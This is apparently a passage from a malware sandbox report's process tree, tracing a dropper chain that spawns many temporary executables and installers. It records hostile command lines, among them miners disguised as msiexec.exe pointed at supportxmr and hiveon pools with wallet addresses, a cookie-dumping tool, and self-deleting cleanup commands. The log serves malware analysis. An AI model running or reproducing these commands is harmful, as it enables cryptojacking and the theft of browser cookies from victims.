                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ic2tdrn.aps\GcleanerWW.exe /mixone & exit
                                                                                                                                  15⤵
                                                                                                                                    PID:6428
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxxkac5n.0i2\setup_10.2_mix.exe & exit
                                                                                                                                    15⤵
                                                                                                                                      PID:5852
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\yxxkac5n.0i2\setup_10.2_mix.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\yxxkac5n.0i2\setup_10.2_mix.exe
                                                                                                                                        16⤵
                                                                                                                                          PID:5688
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uy0gyoih.5ez\file_1.exe & exit
                                                                                                                                        15⤵
                                                                                                                                          PID:7240
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uy0gyoih.5ez\file_1.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\uy0gyoih.5ez\file_1.exe
                                                                                                                                            16⤵
                                                                                                                                              PID:2668
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
                                                                                                                                                17⤵
                                                                                                                                                  PID:948
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\38U83N4LEQ\multitimer.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\38U83N4LEQ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                                    18⤵
                                                                                                                                                      PID:8136
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\38U83N4LEQ\multitimer.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\38U83N4LEQ\multitimer.exe" 1 3.1618033465.60713b392ad06 101
                                                                                                                                                        19⤵
                                                                                                                                                          PID:7752
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\38U83N4LEQ\multitimer.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\38U83N4LEQ\multitimer.exe" 2 3.1618033465.60713b392ad06
                                                                                                                                                            20⤵
                                                                                                                                                              PID:6480
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\awcdwqurevx\Setup3310.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\awcdwqurevx\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                21⤵
                                                                                                                                                                  PID:8024
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-17KC0.tmp\Setup3310.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-17KC0.tmp\Setup3310.tmp" /SL5="$10A00,138429,56832,C:\Users\Admin\AppData\Local\Temp\awcdwqurevx\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                    22⤵
                                                                                                                                                                      PID:7632
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-CLF6U.tmp\Setup.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-CLF6U.tmp\Setup.exe" /Verysilent
                                                                                                                                                                        23⤵
                                                                                                                                                                          PID:7728
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1gr1vhgqzh0\14btlc4lcbl.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1gr1vhgqzh0\14btlc4lcbl.exe" /ustwo INSTALL
                                                                                                                                                                      21⤵
                                                                                                                                                                        PID:5604
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 652
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5144
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 640
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4884
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 732
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4764
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 808
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:8664
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 896
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:8836
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 900
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5408
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1184
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6112
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1212
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4764
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1296
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:8148
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1288
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:2944
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fjenvzug0hz\app.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\fjenvzug0hz\app.exe" /8-23
                                                                                                                                                                        21⤵
                                                                                                                                                                          PID:8676
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lfxw24ckdtp\setup_10.2_us3.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\lfxw24ckdtp\setup_10.2_us3.exe" /silent
                                                                                                                                                                          21⤵
                                                                                                                                                                            PID:2408
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\setups.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\setups.exe" ll
                                                                                                                                                                      18⤵
                                                                                                                                                                        PID:6560
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7701J.tmp\setups.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7701J.tmp\setups.tmp" /SL5="$40880,1873631,71168,C:\Users\Admin\AppData\Local\Temp\DAY3UD6E1W\setups.exe" ll
                                                                                                                                                                          19⤵
                                                                                                                                                                            PID:5812
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Free.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Free.exe"
                                                                                                                                                                        17⤵
                                                                                                                                                                          PID:4348
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                            18⤵
                                                                                                                                                                              PID:6448
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                            17⤵
                                                                                                                                                                              PID:1672
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3E7D.tmp.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3E7D.tmp.exe"
                                                                                                                                                                                18⤵
                                                                                                                                                                                  PID:9044
                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                    -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w8577 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                    19⤵
                                                                                                                                                                                      PID:7184
                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w75@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                      19⤵
                                                                                                                                                                                        PID:5012
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                                      18⤵
                                                                                                                                                                                        PID:988
                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                                          19⤵
                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                          PID:796
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
                                                                                                                                                                                      17⤵
                                                                                                                                                                                        PID:8624
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bqwipxiq.nn0\6762a766.exe & exit
                                                                                                                                                                                    15⤵
                                                                                                                                                                                      PID:7080
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bqwipxiq.nn0\6762a766.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bqwipxiq.nn0\6762a766.exe
                                                                                                                                                                                        16⤵
                                                                                                                                                                                          PID:8372
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cxjeag0z.cm2\app.exe /8-2222 & exit
                                                                                                                                                                                        15⤵
                                                                                                                                                                                          PID:5532
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\cxjeag0z.cm2\app.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\cxjeag0z.cm2\app.exe /8-2222
                                                                                                                                                                                            16⤵
                                                                                                                                                                                              PID:6408
                                                                                                                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:5608
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-M1C7F.tmp\lylal220.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-M1C7F.tmp\lylal220.tmp" /SL5="$105FA,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                                                                      12⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:6024
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-HAOEE.tmp\ysAGEL.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-HAOEE.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                                                                                                        13⤵
                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:6652
                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\UHSGYBSVCI\irecord.exe
                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\UHSGYBSVCI\irecord.exe" /VERYSILENT
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:6396
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-7FKMQ.tmp\irecord.tmp
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-7FKMQ.tmp\irecord.tmp" /SL5="$4039C,5922518,66560,C:\Program Files\Mozilla Firefox\UHSGYBSVCI\irecord.exe" /VERYSILENT
                                                                                                                                                                                              15⤵
                                                                                                                                                                                                PID:6276
                                                                                                                                                                                                • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                    PID:4476
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9f-f2730-bba-3bf93-3d28b1f4741f0\Suqyjaepaelo.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\9f-f2730-bba-3bf93-3d28b1f4741f0\Suqyjaepaelo.exe"
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                  PID:6968
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\79-82057-fcd-4a5a9-81a68422c16ee\SHenewenuqi.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\79-82057-fcd-4a5a9-81a68422c16ee\SHenewenuqi.exe"
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:7124
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4o4lhtlh.bc0\gaooo.exe & exit
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                        PID:8820
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4o4lhtlh.bc0\gaooo.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4o4lhtlh.bc0\gaooo.exe
                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                            PID:9148
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                PID:7548
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                  PID:8196
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owggv0z3.yqf\jg8_8qyu.exe & exit
                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                PID:7444
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\owggv0z3.yqf\jg8_8qyu.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\owggv0z3.yqf\jg8_8qyu.exe
                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                    PID:7860
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\axqrcush.hr4\google-game.exe & exit
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                    PID:7244
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\axqrcush.hr4\google-game.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\axqrcush.hr4\google-game.exe
                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                        PID:8588
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                            PID:7156
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fuzb1p2q.lcz\Sabor.exe & exit
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                          PID:8236
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fuzb1p2q.lcz\Sabor.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\fuzb1p2q.lcz\Sabor.exe
                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:5380
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjrco2q5.rjd\BarSetpFile.exe /silent & exit
                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                            PID:7868
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\mjrco2q5.rjd\BarSetpFile.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\mjrco2q5.rjd\BarSetpFile.exe /silent
                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                PID:8932
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30ekvs5d.nkd\wwfvd.exe & exit
                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                PID:7240
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\30ekvs5d.nkd\wwfvd.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\30ekvs5d.nkd\wwfvd.exe
                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                    PID:8024
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\30ekvs5d.nkd\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                        PID:8568
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                          taskkill /im wwfvd.exe /f
                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                          PID:8400
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:5064
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z1zvqxcx.eal\askinstall31.exe & exit
                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                      PID:8628
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\z1zvqxcx.eal\askinstall31.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\z1zvqxcx.eal\askinstall31.exe
                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                          PID:8432
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                              PID:8056
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                PID:5228
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\okzqa4bg.e3g\toolspab1.exe & exit
                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                            PID:8164
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\okzqa4bg.e3g\toolspab1.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\okzqa4bg.e3g\toolspab1.exe
                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                PID:7944
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\okzqa4bg.e3g\toolspab1.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\okzqa4bg.e3g\toolspab1.exe
                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                    PID:4388
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lu5ajj33.5h1\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\krdoxn0j.zio\setup_10.2_mix.exe & exit
                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                    PID:5208
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\krdoxn0j.zio\setup_10.2_mix.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\krdoxn0j.zio\setup_10.2_mix.exe
                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                        PID:1852
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iql2fdod.tl2\file_1.exe & exit
                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                        PID:2412
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\iql2fdod.tl2\file_1.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\iql2fdod.tl2\file_1.exe
                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                            PID:6840
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                PID:2420
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\UM534F2PGA\multitimer.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\UM534F2PGA\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                                    PID:5024
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\UM534F2PGA\multitimer.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\UM534F2PGA\multitimer.exe" 1 3.1618033508.60713b64ad43a 101
                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                        PID:1016
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\UM534F2PGA\multitimer.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\UM534F2PGA\multitimer.exe" 2 3.1618033508.60713b64ad43a
                                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                                            PID:9036
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aac5liyuo2f\app.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\aac5liyuo2f\app.exe" /8-23
                                                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                                                PID:816
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\hgj2zymhhvk\Setup3310.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\hgj2zymhhvk\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                  PID:6944
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-IOJP9.tmp\Setup3310.tmp
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-IOJP9.tmp\Setup3310.tmp" /SL5="$30ADE,138429,56832,C:\Users\Admin\AppData\Local\Temp\hgj2zymhhvk\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                      PID:3860
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3F7LL.tmp\Setup.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3F7LL.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                                                                                          PID:10140
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1mazpaxkbbh\co2rk22kbrt.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1mazpaxkbbh\co2rk22kbrt.exe" /ustwo INSTALL
                                                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                                                        PID:3804
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 648
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:10072
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 660
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:10216
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 696
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:9296
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 632
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:9392
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 880
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:9144
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 928
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:9980
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 1176
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:852
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 1140
                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:9744
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 1292
                                                                                                                                                                                                                                                                                          22⤵
